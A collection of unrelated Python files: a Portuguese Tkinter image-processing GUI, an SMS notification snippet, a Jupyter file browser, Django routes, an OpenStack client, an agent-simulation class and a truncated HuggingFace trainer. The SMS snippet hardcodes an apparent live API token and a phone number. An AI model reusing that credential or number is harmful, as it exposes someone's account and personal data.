self.binarizar_show.pack(side=tk.TOP)
self.binarizar_botoes = tk.Label(self.janela_binarizar)
self.binarizar_botoes.pack(side = tk.TOP)
self.binarizar_fechar = tk.Button(self.binarizar_botoes,
text='Cancelar',
command = lambda: self.binarizar('cancelar'))
self.binarizar_fechar.pack(side=tk.LEFT)
self.binarizar_ok = tk.Button(self.binarizar_botoes,
text = 'OK',
command = lambda: self.binarizar('confirmar'))
self.binarizar_ok.pack(side = tk.LEFT)
self.binarizar_parametros = tk.Label(self.janela_binarizar)
self.binarizar_parametros.pack(side = tk.TOP)
self.label_limiar = tk.Label(self.binarizar_parametros,
text = 'Limiar()')
self.label_limiar.grid(row=0,column=0)
self.limiar_binarizacao = tk.StringVar()
self.entry_limiar = tk.Entry(self.binarizar_parametros,
textvariable = self.limiar_binarizacao)
self.entry_limiar.grid(row=0,column=1)
self.limiar_binarizacao.trace('w',lambda a,b,c: self.binarizar('atualizar'))
self.binarizar_botao_aumentar = tk.Button(self.binarizar_parametros,
text = '+',
command = lambda: self.binarizar('aumentar'))
self.binarizar_botao_aumentar.grid(row=0,column=2)
self.binarizar_botao_diminuir = tk.Button(self.binarizar_parametros,
text = '-',
command = lambda: self.binarizar('diminuir'))
self.binarizar_botao_diminuir.grid(row=0,column=3)
# Filtros
self.funcao_filtro = None
self.janela_filtro = tk.Toplevel(self.parent)
self.janela_filtro.protocol('WM_DELETE_WINDOW', lambda: print('Invalido'))
self.filtro_label = tk.Label(self.janela_filtro)
self.filtro_label.grid(row = 0, column = 0)
self.filtro_var = tk.StringVar()
self.filtro_var.trace('w', lambda a,b,c: self.funcao_filtro('atualizar'))
self.filtro_campo = tk.Entry(self.janela_filtro,
textvariable = self.filtro_var)
self.filtro_campo.grid(row = 0, column = 1)
self.filtro_botao_aumentar = tk.Button(self.janela_filtro,
text = '+',
command = lambda: self.funcao_filtro('aumentar'))
self.filtro_botao_aumentar.grid(row=0, column = 2)
self.filtro_botao_diminuir = tk.Button(self.janela_filtro,
text = '-',
command = lambda: self.funcao_filtro('diminuir'))
self.filtro_botao_diminuir.grid(row=0, column = 3)
self.filtro_botao_ok = tk.Button(self.janela_filtro,
text = 'OK',
command = lambda: self.funcao_filtro('aceitar'))
self.filtro_botao_ok.grid(row=1, column = 0)
self.filtro_botao_cancelar = tk.Button(self.janela_filtro,
text = 'Cancelar',
command = lambda: self.funcao_filtro('cancelar'))
self.filtro_botao_cancelar.grid(row=1, column = 1)
self.janela_filtro.withdraw()
# Ruido
self.janela_ruido = tk.Toplevel(self.parent)
self.ruido_var1 = tk.StringVar()
self.ruido_var1.set('100')
self.ruido_var1.trace('w', lambda a,b,c: self.gerar_imagem_ruido('atualizar'))
self.ruido_label1 = tk.Label(self.janela_ruido, text = 'Altura(100): ')
self.ruido_label1.grid(column = 0, row = 0)
self.ruido_entry1 = tk.Entry(self.janela_ruido,
textvariable = self.ruido_var1)
self.ruido_entry1.grid(row = 0, column = 1)
self.ruido_var2 = tk.StringVar()
self.ruido_var2.set('100')
self.ruido_var2.trace('w', lambda a,b,c: self.gerar_imagem_ruido('atualizar'))
self.ruido_label2 = tk.Label(self.janela_ruido, text = 'Largura(100): ')
self.ruido_label2.grid(column = 0, row = 1)
self.ruido_entry2 = tk.Entry(self.janela_ruido,
textvariable = self.ruido_var2)
self.ruido_entry2.grid(column=1, row=1)
self.ruido_var3 = tk.StringVar()
self.ruido_var3.set('0.5')
self.ruido_var3.trace('w', lambda a,b,c: self.gerar_imagem_ruido('atualizar'))
self.ruido_label3 = tk.Label(self.janela_ruido, text = 'Proporcao(0.5): ')
self.ruido_label3.grid(column = 0, row = 2)
self.ruido_entry3 = tk.Entry(self.janela_ruido,
textvariable = self.ruido_var3)
self.ruido_entry3.grid(column=1, row=2)
self.ruido_ok = tk.Button(self.janela_ruido,
text = 'OK',
command = lambda: self.gerar_imagem_ruido('aceitar'))
self.ruido_ok.grid(column = 0, row = 3)
self.ruido_cancelar = tk.Button(self.janela_ruido,
text = 'Cancelar',
command = lambda: self.gerar_imagem_ruido('cancelar'))
self.ruido_cancelar.grid(row = 3, column = 1)
self.janela_ruido.withdraw()
parent.config(menu=self.menu)
parent.geometry('400x300')
def salvar_imagem(self):
if self.img != None:
salvar(self.img)
def fechar(self):
self.parent.quit()
self.parent.destroy()
def carregar_imagem(self):
self.img = pil.open(filedialog.askopenfilename())
self.img_desfazer = None
self.atualizar()
def fechar_imagem(self):
self.img, self.img_desfazer = None, self.img
self.atualizar()
def desfazer(self):
if self.img_desfazer == None:
print ('Sem imagem para desfazer')
return
self.img, self.img_desfazer = self.img_desfazer, self.img
self.atualizar()
def atualizar(self):
self.canvas.delete('all')
if self.img == None:
return
self.photo_img = imagetk.PhotoImage(self.img)
size = self.img.size
self.canvas_image = self.canvas.create_image(0,0,anchor='nw',
image=self.photo_img)
self.canvas.config(width=min(size[0],MAX_WIDTH),
height=min(size[1],MAX_HEIGHT) )
self.canvas.config(scrollregion=(0,0,size[0],size[1]))
def escala_de_cinza(self):
if self.img.mode == 'L':
return
self.img_desfazer = self.img
self.img = self.img.convert('L')
self.atualizar()
def binarizar(self, modo = 'iniciar'):
'''
Modos: iniciar, confirmar, atualizar, cancelar, aumentar, diminuir
'''
if modo == 'iniciar':
if self.img.mode == 'L':
mat = np.array(self.img)
else:
mat = np.array(self.img.convert('L'))
histograma(mat) #grava o grafico para uma variavel interna, plt.gcp()
self.hist_img = plt_to_image().copy()
self.hist_img = imagetk.PhotoImage(self.hist_img.convert('RGB'))
self.hist_ref = self.hist_img
self.binarizar_show.config(image=self.hist_img)
self.janela_binarizar.deiconify()
self.otsu = filters.threshold_otsu(np.array(self.img))
self.label_limiar.configure(text = 'Limiar ('+str(self.otsu)+') :')
self.img_original = self.img.copy()
self.limiar_valido = self.otsu
self.limiar_binarizacao.set(self.otsu)
elif modo == 'confirmar':
self.img_desfazer = self.img_original
self.janela_binarizar.withdraw()
elif modo == 'atualizar':
if not self.limiar_binarizacao.get().isdigit() and self.limiar_binarizacao.get() != '':
self.limiar_binarizacao.set(self.limiar_valido)
return
elif self.limiar_binarizacao.get() == "":
self.limiar_valido = ""
return
self.limiar_valido = int(self.limiar_binarizacao.get())
self.img = binarizar(np.array(self.img_original),
int(self.limiar_binarizacao.get()))
self.img = pil.fromarray(self.img)
self.atualizar()
elif modo == 'cancelar':
self.img = self.img_original
self.atualizar()
self.janela_binarizar.withdraw()
elif modo == 'aumentar':
self.limiar_binarizacao.set(str(int(self.limiar_binarizacao.get())+1))
elif modo == 'diminuir':
self.limiar_binarizacao.set(str(int(self.limiar_binarizacao.get())-1))
def histograma(self):
if self.img.mode == 'L':
mat = np.array(self.img)
else:
mat = np.array(self.img.convert('L'))
histograma(mat) #grava o grafico para uma variavel interna, plt.gcp()
self.hist_img = plt_to_image().copy()
self.hist_img = imagetk.PhotoImage(self.hist_img.convert('RGB'))
self.hist_ref = self.hist_img
self.histograma_show.config(image=self.hist_img)
self.janela_histograma.deiconify()
def mapa_distancia(self):
mat = np.array(self.img)
binaria = verificar_binaria(mat)
print (binaria)
if not binaria:
return
self.img_desfazer = self.img.copy()
self.img = pil.fromarray(mapa_distancia(mat))
self.atualizar()
def inverter(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = inverter(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(inverter,(mat1,mat2,mat3)))
mat = np.stack((mat1, mat2, mat3),axis=-1)
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def expandir_contraste(self):
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
self.img = pil.fromarray(expandir_contraste(mat))
self.atualizar()
def equalizar_histograma(self):
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
self.img = pil.fromarray(equalizar_histograma(mat))
self.atualizar()
def filtro(self,modo):
'''
modos: init gauss, init media, init real, atualizar, confirmar,
cancelar, aumentar, diminuir
'''
print(modo)
if modo.split()[0] == 'init':
self.funcao_filtro = self.filtro
filtro = modo.split()[1]
if filtro == 'gauss':
self.filtro_atual = filtro_gaussiano
self.janela_filtro.title('Filtro Gaussiano')
self.filtro_label.config(text = 'Desvio Padrao (1.0)')
elif filtro == 'media':
if self.img.mode != 'L':
print ('Filtro disponivel apenas em escala de cinza')
return
self.filtro_atual = filtro_mediana
self.janela_filtro.title('Filtro da Mediana')
self.filtro_label.config(text = 'Tamanho Disco (1.0)')
elif filtro == 'real':
if self.img.mode != 'L':
print ('Filtro disponivel apenas em escala de cinza')
return
self.filtro_atual = filtro_realce
self.janela_filtro.title('Filtro da Realce')
self.filtro_label.config(text = 'Tamanho Disco (1.0)')
elif filtro == 'gaussiano':
self.filtro_atual = gerar_ruido_gaussiano
self.janela_filtro.title('Filtro Gaussiano')
self.filtro_label.config(text = 'Desvio Padrao (0.1)')
elif filtro == 'snp':
self.filtro_atual = gerar_ruido_snp
self.janela_filtro.title('Filtro Sal e Pimenta')
self.filtro_label.config(text = 'Densidade (0.1)')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('1.0')
self.filtro_var_valida = '1.0'
elif modo == 'atualizar':
if self.filtro_var.get() == '':
self.filtro_var_valida = ''
self.img = self.img_original
self.atualizar()
return
valid = [i for i in self.filtro_var.get()
if i in '1234567890.']
if len(valid) != len(self.filtro_var.get()) or self.filtro_var.get().count('.') > 1:
self.filtro_var.set(self.filtro_var_valida)
return
print ('atualizando')
mat = np.array(self.img_original)
mat = self.filtro_atual(mat,float(self.filtro_var.get()))
self.img = pil.fromarray(mat)
self.atualizar()
elif modo == 'cancelar':
self.img = self.img_original
self.janela_filtro.withdraw()
self.atualizar()
elif modo == 'aceitar':
self.img_defazer = self.img_original
self.janela_filtro.withdraw()
elif modo == 'aumentar':
self.filtro_var.set(str(float(self.filtro_var.get())+1))
elif modo == 'diminuir':
if float(self.filtro_var.get()) < 1:
self.filtro_var.set('0')
else:
self.filtro_var.set(str(float(self.filtro_var.get())-1))
def filtro_prewitt(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = filtro_prewitt(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(filtro_prewitt,(mat1,mat2,mat3)))
mat = (mat1 + mat2 + mat3)//3
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def filtro_sobel(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = filtro_sobel(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(filtro_sobel,(mat1,mat2,mat3)))
mat = (mat1 + mat2 + mat3)//3
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def filtro_scharr(self):
if self.img.mode == 'L':
mat = np.array(self.img)
mat = filtro_scharr(mat)
else:
mat1, mat2, mat3 = self.img.split()
mat1, mat2, mat3 = list(map(np.array,(mat1,mat2,mat3)))
mat1, mat2, mat3 = list(map(filtro_scharr,(mat1,mat2,mat3)))
mat = (mat1 + mat2 + mat3)//3
self.img_desfazer = self.img
self.img = pil.fromarray(mat)
self.atualizar()
def morfologia(self, modo):
'''
modos: init erosao, init dilatacao, init abertura, init fechamento,
atualizar, cancelar, confirmar, aumentar, diminuir
'''
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
if modo.split()[0] == 'init':
self.funcao_filtro = self.filtro
filtro = modo.split()[1]
if filtro == 'erosao':
self.filtro_atual = erosao
self.janela_filtro.title('Erosao')
self.filtro_label.config(text = 'Erosao(1): ')
elif filtro == 'dilatacao':
self.filtro_atual = dilatacao
self.janela_filtro.title('Dilatacao')
self.filtro_label.config(text = 'Dilatacao(1): ')
elif filtro == 'abertura':
self.filtro_atual = abertura
self.janela_filtro.title('Abertura')
self.filtro_label.config(text = 'Abertura(1): ')
elif filtro == 'fechamento':
self.filtro_atual = fechamento
self.janela_filtro.title('Fechamento')
self.filtro_label.config(text = 'Fechamento (1): ')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('1')
self.filtro_var_valida = '1'
elif modo == 'atualizar':
if self.filtro_var.get() == '' or '0':
self.filtro_var_valida = ''
self.img = self.img_original
self.atualizar()
return
valid = [i for i in self.filtro_var.get()
if i in '1234567890']
if len(valid) != len(self.filtro_var.get()) or self.filtro_var.get().count('.') > 1:
self.filtro_var.set(self.filtro_var_valida)
return
mat = np.array(self.img_original)
mat = self.filtro_atual(mat,float(self.filtro_var.get()))
self.img = pil.fromarray(mat)
self.atualizar()
elif modo == 'cancelar':
self.img = self.img_original
self.janela_filtro.withdraw()
self.atualizar()
elif modo == 'aceitar':
self.img_defazer = self.img_original
self.janela_filtro.withdraw()
elif modo == 'aumentar':
self.filtro_var.set(str(float(self.filtro_var.get())+1))
elif modo == 'diminuir':
if float(self.filtro_var.get()) < 1:
self.filtro_var.set('0')
else:
self.filtro_var.set(str(float(self.filtro_var.get())-1))
def granulometria(self):
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
plt.clf()
mat = np.array(self.img)
granulometria(mat)
self.granulometria_img = plt_to_image().copy()
self.granulometria_img = imagetk.PhotoImage(
self.granulometria_img.convert('RGB'))
self.gran_img_ref = self.granulometria_img
self.histograma_show.config(image=self.granulometria_img)
self.janela_histograma.deiconify()
def correlacao(self):
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
plt.clf()
mat = np.array(self.img)
correlacao(mat)
self.granulometria_img = plt_to_image().copy()
self.granulometria_img = imagetk.PhotoImage(
self.granulometria_img.convert('RGB'))
self.gran_img_ref = self.granulometria_img
self.histograma_show.config(image=self.granulometria_img)
self.janela_histograma.deiconify()
def rotular(self):
binaria =verificar_binaria(np.array(self.img))
if not binaria:
print('Funcao apenas para imagens binarias')
return
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
mat = rotular_colorido(mat)
print(mat.max())
self.img = pil.fromarray(mat)
self.atualizar()
def conectividade(self):
binario = verificar_binaria(np.array(self.img))
if not binario:
print ('funcao apenas para imagens binarizadas')
return
plt.clf()
mat = np.array(self.img)
conectividade(mat)
self.granulometria_img = plt_to_image().copy()
self.granulometria_img = imagetk.PhotoImage(
self.granulometria_img.convert('RGB'))
self.gran_img_ref = self.granulometria_img
self.histograma_show.config(image=self.granulometria_img)
self.janela_histograma.deiconify()
def propriedades(self):
pass
def gerar_ruido(self,modo):
if modo == 'init gaussiano':
self.funcao_filtro = self.gerar_ruido
self.filtro_atual = gerar_ruido_gaussiano
self.janela_filtro.title('Filtro Gaussiano')
self.filtro_label.config(text = 'Desvio Padrao (1.0)')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('1.0')
self.filtro_var_valida = '1.0'
elif modo == 'init snp':
self.funcao_filtro = self.gerar_ruido
self.filtro_atual = gerar_ruido_snp
self.janela_filtro.title('Filtro Sal e Pimenta')
self.filtro_label.config(text = 'Densidade (0.1)')
self.janela_filtro.deiconify()
self.img_original = self.img.copy()
self.filtro_var.set('0.1')
self.filtro_var_valida = '0.1'
def gerar_ruido_snp(self):
pass
def gerar_imagem_ruido(self, modo):
'''
modos: init, atualizar, aceitar, cancelar
'''
if not self.img == None:
print('Gerar imagens apenas se nao houver imagem carregada')
return
if modo == 'init':
self.ruido_var1_valida = self.ruido_var1.get()
self.ruido_var2_valida = self.ruido_var2.get()
self.ruido_var3_valida = self.ruido_var3.get()
self.janela_ruido.deiconify()
elif modo == 'atualizar':
for var in (self.ruido_var1,):
valid = [i for i in var.get()
if i in '1234567890']
if len(valid) != len(var.get()) or var.get().count('.') > 1:
var.set(self.ruido_var1_valida)
return
for var in (self.ruido_var2,):
valid = [i for i in var.get()
if i in '1234567890']
if len(valid) != len(var.get()) or var.get().count('.') > 1:
var.set(self.ruido_var2_valida)
return
for var in (self.ruido_var3,):
valid = [i for i in var.get()
if i in '1234567890.']
if len(valid) != len(var.get()) or var.get().count('.') > 1:
var.set(self.ruido_var3_valida)
return
self.ruido_var1_valida = self.ruido_var1.get()
self.ruido_var2_valida = self.ruido_var2.get()
self.ruido_var3_valida = self.ruido_var3.get()
elif modo == 'cancelar':
self.janela_ruido.withdraw()
elif modo == 'aceitar':
largura = int(self.ruido_var1.get())
altura = int(self.ruido_var2.get())
densidade = float(self.ruido_var3.get())
self.img = pil.fromarray(gerar_imagem_ruido(
(largura,altura),densidade))
self.atualizar()
self.janela_ruido.withdraw()
def extrair_bordas(self):
binaria = verificar_binaria(np.array(self.img))
if not binaria:
print('Funcao apenas para imagens binarias')
return
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
mat = extrair_bordas(mat, mediana = 1, gaussiano = 2, realce = 2,
limiar = None, mediana2 = 0,
janela = 100, offset = 0)
print(mat.max())
self.img = pil.fromarray(mat)
self.atualizar()
def segregacao_watershed(self):
binaria = verificar_binaria(np.array(self.img))
if not binaria:
print('Funcao apenas para imagens binarias')
return
mat = np.array(self.img)
self.img_desfazer = self.img.copy()
mat = segregacao_watershed(mat, pegada = 5, limiar = 0)
print(mat.max())
self.img = pil.fromarray(mat)
self.atualizar()
root = tk.Tk()
root.title('Imaginos')
interface = Interface(root)
root.mainloop()
|
import pandas as pd
def sendMessage():
import requests
url = "https://www.fast2sms.com/dev/bulk"
payload = "sender_id=FSTSMS&message=The%20model%20have%20been%20trained%20successfully&language=english&route=p&numbers=8126102904"
headers = {
'authorization': "OuX3BnsANZWIvpQzT70ikgD4ERwehbyHdV2Ff6MmSL51jCU8KoHnlJ3aR0FVTeK6buhgvmy9dkL7zqYj",
'Content-Type': "application/x-www-form-urlencoded",
'Cache-Control': "no-cache",
}
response = requests.request("POST", url, data=payload, headers=headers)
print(response.text)
|
"""
Class implementing a simple file browser for Jupyter
"""
# Author: Guillaume Witz, Science IT Support, Bern University, 2019
# License: BSD3
import ipywidgets as ipw
from pathlib import Path
class Folders:
def __init__(self, rows=10, window_width=300, init_path=None):
style = {"description_width": "initial"}
layout = {"width": "300px"}
if init_path is None:
self.cur_dir = Path(".").resolve()
else:
self.cur_dir = Path(init_path).resolve()
self.out = ipw.Output()
self.file_list = ipw.SelectMultiple(
rows=rows, layout={"width": str(window_width) + "px"}
)
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
self.refresh_button = ipw.Button(
description="Refresh folder content", style=style, layout=layout
)
self.refresh_button.on_click(self.refresh)
def get_files(self):
current_files = [x.name for x in self.cur_dir.glob("*") if not x.is_dir()]
current_folders = [x.name for x in self.cur_dir.glob("*") if x.is_dir()]
current_files = sorted(current_files, key=str.lower)
current_folders = sorted(current_folders, key=str.lower)
return current_folders + current_files
def refresh(self, b):
self.file_list.unobserve(self.move_folders, names="value")
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
def move_folders(self, change):
if len(change["new"]) == 0:
self.cur_dir = self.cur_dir.resolve().parent
else:
if change["new"][0] == "..":
self.cur_dir = self.cur_dir.resolve().parent
self.file_list.unobserve(self.move_folders, names="value")
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
else:
old_dir = self.cur_dir
self.cur_dir = self.cur_dir.joinpath(change["new"][0])
if self.cur_dir.is_dir():
self.file_list.unobserve(self.move_folders, names="value")
self.file_list.options = [".."] + self.get_files()
self.file_list.value = ()
self.file_list.observe(self.move_folders, names="value")
else:
self.cur_dir = old_dir
def go_to_folder(self, folder):
self.cur_dir = Path(folder).resolve()
self.refresh(None)
|
from . import views
from django.urls import path
from django.contrib import admin
urlpatterns=[
path("admin/", admin.site.urls),
path("",views.index, name="index"),
path("maps", views.base, name="base"),
path("profile", views.profile, name="profile"),
path("add_todo",views.add_todo, name="add_todo"),
path("delete_todo/<int:todo_id>",views.delete_todo, name="delete_todo"),
]
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Christiaan Frans Rademan <chris@fwiw.co.za>.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
from luxon import constants as const
from luxon.utils.http import Client
from psychokinetic.openstack.api.identityv3 import IdentityV3
from psychokinetic.openstack.api.networkv2 import NetworkV2
from psychokinetic.openstack.api.imagev2 import ImageV2
from psychokinetic.openstack.api.apibase import APIBase as OrchestrationV1
from psychokinetic.openstack.api.apibase import APIBase as ComputeV1
from psychokinetic.openstack.api.apibase import APIBase as VolumeV1
from psychokinetic.openstack.api.apibase import APIBase as VolumeV2
from psychokinetic.openstack.api.apibase import APIBase as VolumeV3
from psychokinetic.openstack.api.apibase import APIBase as ObjectStoreV1
from psychokinetic.openstack.api.apibase import APIBase as WorkloadsV1
from psychokinetic.openstack.api.apibase import APIBase as S3V1
from psychokinetic.openstack.api.apibase import APIBase as CloudformationV1
from psychokinetic.openstack.api.apibase import APIBase as MeteringV1
class Openstack(Client):
"""Restclient to use on Openstack Implementation.
Log in and change scope with with Keystone, then execute on the chosen
Service.
Args:
keystone_url(str): URL of Keystone API.
region(str): Region of this Openstack implementation.
interface(str): Which openstack interface to use - 'public', 'internal'
or 'admin'.
Example usage:
.. code:: python
os = Openstack(keystone_url='http://example:5000/v3', region="RegionOne")
os.identity.authenticate('admin','password','default')
os.identity.scope(project_name="Customer1", domain="default")
projects = os.identity.execute('GET','tenants').json
"""
def __init__(self, keystone_url,
region='RegionOne',
interface='public'):
# The user should only be able to select interface public or internal.
# Lower case it as well and lower the ones we get.
super().__init__()
self['Content-Type'] = const.APPLICATION_JSON
self.keystone_url = keystone_url
# We store the login token here, it will also be placed in the global
# HTTP client headers using Client[header] = value.
# However we need a copy, since when using the identity.scope method
# will change the header to the scoped token. If the user wishes to
# use the 'scope' or 'unscope' method again on identity it will need
# the original unscoped token.
self._login_token = None
# To keep track important dont remove... if user wishes to know current
# environment information.
self._scoped_token = None
# Dictionary with key being 'type' ie image, metering, identity,
# network, orchestration, volume, volume2, volumev3, etc.
# The value being the url. Its not neccessary to store region,
# interface, because its selected at Openstack client init.
# The identity.scope method will populate these values.
self._user_endpoints = {}
# We have to fill below ones anyways.
self._admin_endpoints = {}
self._public_endpoints = {}
# The following interface, region is used to by identity.scope
# to determine the endpoints that are stored above in endpoints.
self.interface = interface
self.region = region
@property
def identity(self):
return IdentityV3(self, 'identity')
@property
def compute(self):
return ComputeV1(self, 'compute')
@property
def orchestration(self):
return OrchestrationV1(self, 'orchestration')
@property
def network(self):
return NetworkV2(self, 'network')
@property
def volume(self):
return VolumeV1(self, 'volume')
@property
def volumev2(self):
return VolumeV2(self, 'volumev2')
@property
def volumev3(self):
return VolumeV3(self, 'volumev3')
@property
def image(self):
return ImageV2(self, 'image')
@property
def object_store(self):
return ObjectStoreV1(self, 'object-store')
@property
def workloads(self):
return WorkloadsV1(self, 'workloads')
@property
def s3(self):
return S3V1(self, 's3')
@property
def cloudformation(self):
return CloudformationV1(self, 'cloudformation')
@property
def metering(self):
return MeteringV1(self, 'metering')
|
# encoding: utf-8
from login import LoginHandler
# from
__all__ = [LoginHandler]
|
import numpy as np
import pandas as pd
import gc
from multiprocessing import Pool, cpu_count
from functools import partial
class Globe:
"""
Globe is used to store and process information about the word
and an array of generated agents.
"""
def __init__(self, df, processes=cpu_count() - 1, splits=1):
"""
:param processes:
The number of child processes to be created by the pool. Must be a
minimum of one.
:param splits:
The number of subslices each process will be sent. For larger models
this is needed because there is a limit to the size of data that can
be sent between processes.
"""
self.df = df
self.processes = processes
self.splits = splits
self.pool = Pool(self.processes)
def __getstate__(self):
self_dict = self.__dict__.copy()
del self_dict['pool']
return self_dict
def max_value(self, attribute):
"""
Returns the maximum value for an attribute.
"""
return self.df[attribute].max()
def _gen_agents(self, array):
return pd.concat(
[self.generator(self.df, country, len(population))
for country, population
in array.groupby(array)]
)
def create_agents(self, generator):
"""
Given information on a set of countries and a generator function,
generate the agents and assign the results to ``self.agents``.
:type generator: DataFrame, str, int
:param generator: A function which generates the agents.
"""
self.generator = generator
country_array = pd.concat([pd.Series([c] * k["Population"]) for c, k in self.df.iterrows()])
country_array.index = range(len(country_array))
# Garbage collect before creating new processes.
gc.collect()
"""
self.agents = pd.concat(
self.pool.imap(self._gen_agents,
np.array_split(country_array, self.processes * self.splits))
)
self.agents.index = range(len(self.agents))
"""
self.agents = np.concatenate(
self.pool.imap(self._gen_agents,
np.array_split(country_array, self.processes * self.splits))
)
def run_par(self, function, **kwargs):
"""
Run a function on the agents in parallel.
"""
columns = kwargs["columns"] if "columns" in kwargs else self.agents.columns
# Garbage collect before creating new processes.
gc.collect()
return pd.concat(self.pool.imap(partial(function, **kwargs),
np.array_split(self.agents[columns],
self.processes * self.splits)))
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team All rights reserved.
# Copyright 2021 NVIDIA Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A subclass of `Trainer` specific to Question-Answering tasks
"""
import logging
import os
import torch
from torch.utils.data import DataLoader
import quant_trainer
from transformers import Trainer, is_torch_tpu_available
from transformers.trainer_utils import PredictionOutput
logger = logging.getLogger(__name__)
if is_torch_tpu_available():
import torch_xla.core.xla_model as xm
import torch_xla.debug.metrics as met
class QuestionAnsweringTrainer(Trainer):
def __init__(self, *args, eval_examples=None, post_process_function=None, quant_trainer_args=None, **kwargs):
super().__init__(*args, **kwargs)
self.eval_examples = eval_examples
self.post_process_function = post_process_function
self.quant_trainer_args = quant_trainer_args
self.calib_num = 128 # default number of calibration samples
def get_calib_dataloader(self, calib_dataset=None):
"""
Returns the calibration dataloader :class:`~torch.utils.data.DataLoader`.
Args:
calib_dataset (:obj:`torch.utils.data.Dataset`, `optional`)
"""
if calib_dataset is None and self.calib_dataset is None:
raise ValueError("Trainer: calibration requires an calib_dataset.")
calib_dataset = calib_dataset if calib_dataset is not None else self.calib_dataset
calib_dataset = self._remove_unused_columns(calib_dataset, description="Calibration")
return DataLoader(
calib_dataset,
batch_size=self.args.eval_batch_size,
collate_fn=self.data_collator,
drop_last=self.args.dataloader_drop_last,
num_workers=self.args.dataloader_num_workers,
pin_memory=self.args.dataloader_pin_memory,
shuffle=True,
)
def calibrate(self, calib_dataset=None):
calib_dataset = self.train_dataset if calib_dataset is None else calib_dataset
calib_dataloader = self.get_calib_dataloader(calib_dataset)
model = self.model
quant_trainer.configure_model(model, self.quant_trainer_args, calib=True)
model.eval()
quant_trainer.enable_calibration(model)
logger.info("***** Running calibration *****")
logger.info(f" Num examples = {self.calib_num}")
logger.info(f" Batch size = {calib_dataloader.batch_size}")
for step, inputs in enumerate(calib_dataloader):
# Prediction step
loss, logits, labels = self.prediction_step(model, inputs, prediction_loss_only=True)
if (step + 1) * calib_dataloader.batch_size >= self.calib_num:
break
quant_trainer.finish_calibration(model, self.quant_trainer_args)
self.model = model
def evaluate(self, eval_dataset=None, eval_examples=None, ignore_keys=None, metric_key_prefix: str = "eval"):
eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset
eval_dataloader = self.get_eval_dataloader(eval_dataset)
eval_examples = self.eval_examples if eval_examples is None else eval_examples
# Temporarily disable metric computation, we will do it in the loop here.
compute_metrics = self.compute_metrics
self.compute_metrics = None
eval_loop = self.prediction_loop if self.args.use_legacy_prediction_loop else self.evaluation_loop
try:
output = eval_loop(
eval_dataloader,
description="Evaluation",
# No point gathering the predictions if there are no metrics, otherwise we defer to
# self.args.prediction_loss_only
prediction_loss_only=True if compute_metrics is None else None,
ignore_keys=ignore_keys,
)
finally:
self.compute_metrics = compute_metrics
if self.post_process_function is not None and self.compute_metrics is not None:
eval_preds = self.post_process_function(eval_examples, eval_dataset, output.predictions)
metrics = self.compute_metrics(eval_preds)
# Prefix all keys with metric_key_prefix + '_'
